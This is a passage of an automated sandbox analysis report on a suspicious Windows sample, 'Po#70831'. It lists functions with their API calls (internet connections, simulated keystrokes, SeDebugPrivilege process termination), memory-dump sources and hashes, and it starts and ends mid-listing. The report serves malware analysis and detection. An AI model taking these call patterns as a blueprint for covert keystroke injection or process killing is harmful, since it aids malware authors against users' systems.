                                        • Part of subcall function 0050C253: SetEvent.KERNEL32(?), ref: 0050C336
                                        • Part of subcall function 0050C253: InternetCloseHandle.WININET(00000000), ref: 0050C341
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                      • String ID:
                                      • API String ID: 337547030-0
                                      • Opcode ID: 6f2416d369f6c33580f379ab1291c132d4d05ce9e46b0126b8849ff5a6389d38
                                      • Instruction ID: d42771d315e07672927678039e8f136551aeec32757357e65811c172bbd92c1e
                                      • Opcode Fuzzy Hash: 6f2416d369f6c33580f379ab1291c132d4d05ce9e46b0126b8849ff5a6389d38
                                      • Instruction Fuzzy Hash: C231A075500602EFDB319FA5DD44A6EBFF8FF6A300B044A1DF99682A51C730E815EBA0
                                      Function 004F25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004F3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004F3A57
                                        • Part of subcall function 004F3A3D: GetCurrentThreadId.KERNEL32 ref: 004F3A5E
                                        • Part of subcall function 004F3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004F25B3), ref: 004F3A65
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 004F25BD
                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004F25DB
                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 004F25DF
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 004F25E9
                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004F2601
                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 004F2605
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 004F260F
                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004F2623
                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 004F2627
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                      • String ID:
                                      • API String ID: 2014098862-0
                                      • Opcode ID: 4da5397bfe9e6d680f0eb6cb4cdff0d651afc5c7356c4c701359c252ebcab364
                                      • Instruction ID: a9e6d3fd01c9638e7a9fefef7a9ddbab8321333ba0cebc2b6a565d32e42670ed
                                      • Opcode Fuzzy Hash: 4da5397bfe9e6d680f0eb6cb4cdff0d651afc5c7356c4c701359c252ebcab364
                                      • Instruction Fuzzy Hash: 0001D830790614BBFB2067699C8AF693F59DF5EB12F100006F314AE0D2C9E22449DA69
                                      Function 004F1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,004F1449,?,?,00000000), ref: 004F180C
                                      • HeapAlloc.KERNEL32(00000000,?,004F1449,?,?,00000000), ref: 004F1813
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004F1449,?,?,00000000), ref: 004F1828
                                      • GetCurrentProcess.KERNEL32(?,00000000,?,004F1449,?,?,00000000), ref: 004F1830
                                      • DuplicateHandle.KERNEL32(00000000,?,004F1449,?,?,00000000), ref: 004F1833
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004F1449,?,?,00000000), ref: 004F1843
                                      • GetCurrentProcess.KERNEL32(004F1449,00000000,?,004F1449,?,?,00000000), ref: 004F184B
                                      • DuplicateHandle.KERNEL32(00000000,?,004F1449,?,?,00000000), ref: 004F184E
                                      • CreateThread.KERNEL32(00000000,00000000,004F1874,00000000,00000000,00000000), ref: 004F1868
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                      • String ID:
                                      • API String ID: 1957940570-0
                                      • Opcode ID: ffb0d6dd3a01a69982cf3f08bd6bdfbc686adb35d009a841fb795472d1eefe8c
                                      • Instruction ID: 5798f14219069a5f97d6117568ca82a84b18bd5d29ec073465eb38d5a6d79b7c
                                      • Opcode Fuzzy Hash: ffb0d6dd3a01a69982cf3f08bd6bdfbc686adb35d009a841fb795472d1eefe8c
                                      • Instruction Fuzzy Hash: 7C01BF75640308BFE720AB65DC4EF6B3F6CEF9AB11F104411FA05DB1A2C6749815DB64
                                      Function 0051A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004FD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 004FD501
                                        • Part of subcall function 004FD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 004FD50F
                                        • Part of subcall function 004FD4DC: CloseHandle.KERNEL32(00000000), ref: 004FD5DC
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0051A16D
                                      • GetLastError.KERNEL32 ref: 0051A180
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0051A1B3
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0051A268
                                      • GetLastError.KERNEL32(00000000), ref: 0051A273
                                      • CloseHandle.KERNEL32(00000000), ref: 0051A2C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 2533919879-2896544425
                                      • Opcode ID: 130063920811e339b8a71c8ca1da3e84acbc841fe77934d1fdd1337e0b6e1603
                                      • Instruction ID: 4a9063b8681cce366eb4ade236663e80113b4c0bdef27d0356c005a764612528
                                      • Opcode Fuzzy Hash: 130063920811e339b8a71c8ca1da3e84acbc841fe77934d1fdd1337e0b6e1603
                                      • Instruction Fuzzy Hash: 5561BD35205241AFE721DF15C494F69BFA1BF54318F14849CE4668B7A3C776EC89CB82
                                      Function 00523886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00523925
                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0052393A
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00523954
                                      • _wcslen.LIBCMT ref: 00523999
                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 005239C6
                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 005239F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window_wcslen
                                      • String ID: SysListView32
                                      • API String ID: 2147712094-78025650
                                      • Opcode ID: 0c1695e0bf0caa0a12b87cede17ad28f2ae0637513170ff7a731bd34e8824b5e
                                      • Instruction ID: 31741ef65f356a6aac62198061a8aacdb17b71cae2fa488e4ac02d5e46838932
                                      • Opcode Fuzzy Hash: 0c1695e0bf0caa0a12b87cede17ad28f2ae0637513170ff7a731bd34e8824b5e
                                      • Instruction Fuzzy Hash: 3641C471A00229ABDB219F64DC49BEA7FA9FF09354F100526F944EB2C1D3759D84CB90
                                      Function 004FBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004FBCFD
                                      • IsMenu.USER32(00000000), ref: 004FBD1D
                                      • CreatePopupMenu.USER32 ref: 004FBD53
                                      • GetMenuItemCount.USER32(011852D8), ref: 004FBDA4
                                      • InsertMenuItemW.USER32(011852D8,?,00000001,00000030), ref: 004FBDCC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                      • String ID: 0$2
                                      • API String ID: 93392585-3793063076
                                      • Opcode ID: 09107838a731eac029ba7b29bfa7195a309dd43e11e16d04a4c44b4bc1b2c975
                                      • Instruction ID: cbc4b63bf542a2991a737699976b8e3702f456152995620b364aae9ffb38a1d5
                                      • Opcode Fuzzy Hash: 09107838a731eac029ba7b29bfa7195a309dd43e11e16d04a4c44b4bc1b2c975
                                      • Instruction Fuzzy Hash: 8551EF70A0020D9BDB21CFA9C884BBEBBF5EF46314F14411AEA41D7391D7789945CBAA
                                      Function 004B2D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                      Download Yara Rule
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 004B2D4B
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 004B2D53
                                      • _ValidateLocalCookies.LIBCMT ref: 004B2DE1
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 004B2E0C
                                      • _ValidateLocalCookies.LIBCMT ref: 004B2E61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: &HK$csm
                                      • API String ID: 1170836740-116087588
                                      • Opcode ID: 31a54df242adbd4b43b9a457b58ada36a52021bf85a1a4534314e54be61a5217
                                      • Instruction ID: 98edc7324cd391645f921f19c187f8ee831b5733307af96b50947bdd132bb048
                                      • Opcode Fuzzy Hash: 31a54df242adbd4b43b9a457b58ada36a52021bf85a1a4534314e54be61a5217
                                      • Instruction Fuzzy Hash: C541D334A00208ABCF10EF69C954ADEBBB4FF44318F14805BE8146B392D779AA05CBA5
                                      Function 004FC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadIconW.USER32(00000000,00007F03), ref: 004FC913
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: IconLoad
                                      • String ID: blank$info$question$stop$warning
                                      • API String ID: 2457776203-404129466
                                      • Opcode ID: 8229f7cd78478c5459f5876e59a7b82941f02e364c975a2c7989827266d58c47
                                      • Instruction ID: 99e21fd7a4107bc63695461bf627ddce1e94a0258faa3849221df53bd005873b
                                      • Opcode Fuzzy Hash: 8229f7cd78478c5459f5876e59a7b82941f02e364c975a2c7989827266d58c47
                                      • Instruction Fuzzy Hash: F9110B7178930EBAEB0467549DC2CBB679CDF19355B50002FF600A6282D7A99E05526D
                                      Function 004FED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen$LocalTime
                                      • String ID:
                                      • API String ID: 952045576-0
                                      • Opcode ID: 4f26b9b3d4181272efbe2d2316ea7ae4f216de4fab0eab54bdec891f2ee9157e
                                      • Instruction ID: a6b6b991f04a06808cedfe5ef6cf561abda7a3bb6fd302bf45b303dc475e8a91
                                      • Opcode Fuzzy Hash: 4f26b9b3d4181272efbe2d2316ea7ae4f216de4fab0eab54bdec891f2ee9157e
                                      • Instruction Fuzzy Hash: BE41A365C1011876DB11EBB68C8A9DFB7A8AF45310F5084ABE614E3162FB3CD245C3BD
                                      Function 004AF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,004E682C,00000004,00000000,00000000), ref: 004AF953
                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,004E682C,00000004,00000000,00000000), ref: 004EF3D1
                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,004E682C,00000004,00000000,00000000), ref: 004EF454
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      • Opcode ID: aea597216c85a61f7831ad296deafaa78dd0662c78413520174009f863a9ef8e
                                      • Instruction ID: 3942f7e9276a24f534aedfe7452354b8f8673603fab1fab9c5a355c0be991dd3
                                      • Opcode Fuzzy Hash: aea597216c85a61f7831ad296deafaa78dd0662c78413520174009f863a9ef8e
                                      • Instruction Fuzzy Hash: 4E4159B0204680BAC7748B6E888873B7F99AF77315F58443FE04753661C63DA88DDB5A
                                      Function 00522D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 00522D1B
                                      • GetDC.USER32(00000000), ref: 00522D23
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00522D2E
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00522D3A
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00522D76
                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00522D87
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00525A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00522DC2
                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00522DE1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                      • String ID:
                                      • API String ID: 3864802216-0
                                      • Opcode ID: e3086ab1e8bd953f964fbe45bc7e6cf845cc9db2fd2d3cfe549032e6398194b8
                                      • Instruction ID: fed0fd0f7c14f5f65db2a49381365d2b503d79b69a0583769dcc01435d600929
                                      • Opcode Fuzzy Hash: e3086ab1e8bd953f964fbe45bc7e6cf845cc9db2fd2d3cfe549032e6398194b8
                                      • Instruction Fuzzy Hash: F5318F76101224BBEB214F549C89FEB3FA9FF1A711F044055FE089A192C6759C56C7A4
                                      Function 004F5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: 0d223f1a09614a0ac17ff6a439fa01571dcfeb8f5f82b01c6c8cbe6242f8fb62
                                      • Instruction ID: 048b1eb3ead5068adaad17a95c130e39ae2a4d093bff0b81b36b5ca4ea4c9213
                                      • Opcode Fuzzy Hash: 0d223f1a09614a0ac17ff6a439fa01571dcfeb8f5f82b01c6c8cbe6242f8fb62
                                      • Instruction Fuzzy Hash: F721867164491D77B6146611AD92FFB339CAE21388F840036FF19DAA81F728ED1182AD
                                      Function 00514FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: NULL Pointer assignment$Not an Object type
                                      • API String ID: 0-572801152
                                      • Opcode ID: 37bde2526adc3e18b41b9c6b3f7b780a57baa6173616b4b5095bc35b890a9491
                                      • Instruction ID: 53264360db6fafc02e24be3dadda25cd9b63f13f776c54e7b87d99e31491a8ae
                                      • Opcode Fuzzy Hash: 37bde2526adc3e18b41b9c6b3f7b780a57baa6173616b4b5095bc35b890a9491
                                      • Instruction Fuzzy Hash: 81D1B775A0060ADFEF10CF98D885BEEBBB5BF88344F148469E915AB281E770DD85CB50
                                      Function 004D1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,004D17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 004D15CE
                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004D17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004D1651
